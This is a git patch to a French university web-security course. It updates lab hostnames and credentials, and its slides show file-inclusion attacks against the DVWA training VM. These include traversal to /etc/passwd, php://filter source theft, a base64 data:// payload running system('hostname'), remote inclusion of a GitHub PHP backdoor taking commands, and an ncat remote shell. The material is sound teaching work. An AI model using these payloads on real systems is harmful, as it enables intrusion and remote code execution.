From cadbb482f59c4af4b222f87d3b20495b70fe1867 Mon Sep 17 00:00:00 2001
From: Vincent Mazenod <vmazenod@gmail.com>
Date: Thu, 7 Sep 2023 20:39:35 +0200
Subject: [PATCH] dv.wa url

---
 TODOS.md                           |  6 -----
 content/Etudiants/zz2-f5-websec.md | 18 +++++++--------
 content/slides/1337/md/cmdi.md     |  2 +-
 content/slides/1337/md/fi.md       | 36 +++++++++++++-----------------
 4 files changed, 26 insertions(+), 36 deletions(-)
 delete mode 100644 TODOS.md

diff --git a/TODOS.md b/TODOS.md
deleted file mode 100644
index ea51f86..0000000
--- a/TODOS.md
+++ /dev/null
@@ -1,6 +0,0 @@
-- accepter tous les ssh
-- debian11 / 172
-- mettre le contenu de  https://perso.limos.fr/mazenod/slides/1337/exploits dans kali http://kali/exploits (faire un zip sur le serveur)
-
-- bookmark http://dv.wa
-- mettre burpsuite en raccourci
\ No newline at end of file
diff --git a/content/Etudiants/zz2-f5-websec.md b/content/Etudiants/zz2-f5-websec.md
index 9b333e5..b7e4f17 100644
--- a/content/Etudiants/zz2-f5-websec.md
+++ b/content/Etudiants/zz2-f5-websec.md
@@ -236,20 +236,20 @@ Tags: cours
     * C'est sur cette VM que nous allons tester toutes nos attaques
     * Vous pouvez aussi suivre les cours une dvwa déployé sur votre [VM perso](https://doc.isima.fr/pedagogie/vm/)
         * **l'installation de DVWA** sur votre [VM perso](https://doc.isima.fr/pedagogie/vm/) fait partie de l'évaluation (c.f. section [Evaluation / Installer DVWA sur sa VM perso (2 points)](#installer-dvwa-sur-sa-vm-perso-2-points))
-    * nom d'utilisateur: student
-    * mot de passe: student
+    * nom d'utilisateur: kali
+    * mot de passe: kali
 
 * **debian** héberge la vulnérabilité drupalgeddon présentée en fin de cycle de cours
-    * nom d'utilisateur: student
-    * mot de passe: student
+    * nom d'utilisateur: kali
+    * mot de passe: kali
 
 * **proxy** héberge la vulnérabilité heratbleed présenté en début de cours
-    * nom d'utilisateur: student
-    * mot de passe: student
+    * nom d'utilisateur: kali
+    * mot de passe: kali
 
 * **debian11** est une fresh install de debian 11, qui vous permettra de suivre le déploiement de DVWA en cas de [VM perso](https://doc.isima.fr/pedagogie/vm/) indisponible
-    * nom d'utilisateur: student
-    * mot de passe: student
+    * nom d'utilisateur: kali
+    * mot de passe: kali
 
 Vous trouverez ci après comment redéployer tout cela sur n'importe quelle machine
 
@@ -399,7 +399,7 @@ Ce bug est dû à la numérotation fantaisiste d'Ubuntu des interfaces réseau .
 # dvwa
 172.16.76.146 dvwa dvwa.com dv.wa
 
-# dvwa
+# debian11
 172.16.76.147 debian11
 
 # host
diff --git a/content/slides/1337/md/cmdi.md b/content/slides/1337/md/cmdi.md
index e0c3717..72c7c67 100644
--- a/content/slides/1337/md/cmdi.md
+++ b/content/slides/1337/md/cmdi.md
@@ -131,7 +131,7 @@ sudo apt install ncat
 * puis sur le terminal de l'attaquant
 
 ```shell
-ncat -v vm-etu-vimazeno.local.isima.fr 8080
+ncat -v dv.wa 8080
 ```
 
 * \o/ accès distant à la machine
diff --git a/content/slides/1337/md/fi.md b/content/slides/1337/md/fi.md
index 6aa87c9..bb446b2 100644
--- a/content/slides/1337/md/fi.md
+++ b/content/slides/1337/md/fi.md
@@ -2,10 +2,6 @@
 
 ## aka LFI / RFI
 
-<i class="fa-brands fa-firefox-browser"></i> / <i class="fa-solid fa-desktop"></i>
-<br /><br /><br /><br /><br /><br />
-<small> tapez `<prez>.html?<username-uca>` dans votre navigateur pour suivre le cours avec votre nom de vm</small>
-
 
 ### <i class="fas fa-cogs"></i> File Inclusion
 
@@ -33,7 +29,7 @@ include($_REQUEST['filename']);
 
 * souvent appelé **Directory traversal**
 * permet d'accéder à des fichiers sensibles
-  * [/?page=/etc/passwd](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=/etc/passwd)
+  * [/?page=/etc/passwd](http://dv.wa/vulnerabilities/fi/?page=/etc/passwd)
 
 * marche aussi avec `/etc/hosts`, `~/.bashrc`, `~/.bash_history` ...
 * marche pas avec `/etc/shadow`
@@ -50,7 +46,7 @@ Note:
 * paths absolus / paths relatifs (../.. ou ..\\..)
 * linux `/etc/passwd`, `../../../../../etc/hosts` 
 * windows `c:\boot.ini`, `c:\windows`, `c:\windows\system32\drivers\etc\hosts`
-* [/?page=index.php](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=index.php)
+* [/?page=index.php](http://dv.wa/vulnerabilities/fi/?page=index.php)
     * boucle infinie = ca marche
       * invalider par (include|require)&lowbar;once
 
@@ -73,11 +69,11 @@ allow_url_include=On  # just for test purpose
 
 ### <i class="fa-solid fa-bomb"></i> RFI / low
 
-* <small>[/?page=http://perdu.com](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=http://perdu.com)</small>
+* <small>[/?page=http://perdu.com](http://dv.wa/vulnerabilities/fi/?page=http://perdu.com)</small>
   * <i class="fas fa-poop"></i> drôle mais pas très utile
 
 * <small>[https://perso.limos.fr/mazenod/slides/1337/exploits/_server.php](https://perso.limos.fr/mazenod/slides/1337/exploits/_server.php)</small>
-  * <small>[/?page=https://perso.limos.fr/mazenod/slides/1337/exploits/_server.php](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=https://perso.limos.fr/mazenod/slides/1337/exploits/_server.php)</small>
+  * <small>[/?page=https://perso.limos.fr/mazenod/slides/1337/exploits/_server.php](http://dv.wa/vulnerabilities/fi/?page=https://perso.limos.fr/mazenod/slides/1337/exploits/_server.php)</small>
     * <i class="fa-solid fa-poo"></i> un peu frustrant
 
 
@@ -95,11 +91,11 @@ allow_url_include=On  # just for test purpose
 
 ### <i class="fa-solid fa-bomb"></i> RFI / payloads / backdoor
 
-* <small>[/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php) <i class="fa-solid fa-thumbs-up"></i></small> 
+* <small>[/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php](http://dv.wa/vulnerabilities/fi/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php) <i class="fa-solid fa-thumbs-up"></i></small> 
 
-* <small>[/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php?c=ls](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php?c=ls) <i class="fa-solid fa-thumbs-down"></i></small>
+* <small>[/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php?c=ls](http://dv.wa/vulnerabilities/fi/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php?c=ls) <i class="fa-solid fa-thumbs-down"></i></small>
 
-* <small>[/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php&c=ls](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php&c=ls) <i class="fa-solid fa-thumbs-up"></i></small>
+* <small>[/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php&c=ls](http://dv.wa/vulnerabilities/fi/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php&c=ls) <i class="fa-solid fa-thumbs-up"></i></small>
 
 
 ##  RFI / security medium
@@ -113,11 +109,11 @@ allow_url_include=On  # just for test purpose
   ```
 <small>
 
-* [/?page=hthttp://tp://www.google.fr](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=hthttp://tp://www.google.fr)
+* [/?page=hthttp://tp://www.google.fr](http://dv.wa/vulnerabilities/fi/?page=hthttp://tp://www.google.fr)
   * échapper l'échappement
-* [/?page=php://filter/convert.base64-encode/resource=file1.php](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=file1.php)
+* [/?page=php://filter/convert.base64-encode/resource=file1.php](http://dv.wa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=file1.php)
   * récupère le code source php du fichier file1.php
-* [/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJob3N0bmFtZSIpOyA/Pgo=](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJob3N0bmFtZSIpOyA/Pgo=)
+* [/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJob3N0bmFtZSIpOyA/Pgo=](http://dv.wa/vulnerabilities/fi/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJob3N0bmFtZSIpOyA/Pgo=)
   * exécute `<?php system("hostname"); ?>`
 
 </small>
@@ -140,11 +136,11 @@ Note:
 
 <small>
 
-* [/?page=../../../../../etc/hosts](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=../../../../../etc/hosts)
+* [/?page=../../../../../etc/hosts](http://dv.wa/vulnerabilities/fi/?page=../../../../../etc/hosts)
   * ne fonctionne plus
-* [/?page=../..././..././..././..././..././etc/hosts](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=../..././..././..././..././..././etc/hosts)
+* [/?page=../..././..././..././..././..././etc/hosts](http://dv.wa/vulnerabilities/fi/?page=../..././..././..././..././..././etc/hosts)
   * permet d'échapper l'échappement
-* [/?page=/etc/passwd](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=../..././..././..././..././..././etc/hosts)
+* [/?page=/etc/passwd](http://dv.wa/vulnerabilities/fi/?page=../..././..././..././..././..././etc/hosts)
   * Les paths absolus fonctionnent toujours
 
 </small>
@@ -163,11 +159,11 @@ if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
 <small>
 
 * accès au fichier caché
-  * [/?page=file4.php](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=file4.php)
+  * [/?page=file4.php](http://dv.wa/vulnerabilities/fi/?page=file4.php)
 * [wrapper file](https://www.php.net/manual/en/wrappers.file.php)
-  * [/?page=file:///etc/hosts](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=file:///etc/hosts)
+  * [/?page=file:///etc/hosts](http://dv.wa/vulnerabilities/fi/?page=file:///etc/hosts)
 * le dossier file n'existe pas mais php résout tout de même
-  * [/?page=file/../../../../../../etc/hosts](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=file/../../../../../../etc/hosts)
+  * [/?page=file/../../../../../../etc/hosts](http://dv.wa/vulnerabilities/fi/?page=file/../../../../../../etc/hosts)
 
 
 ## <i class="fa fa-medkit"></i> [open_base_dir](http://php.net/manual/fr/ini.core.php#ini.open-basedir)
-- 
GitLab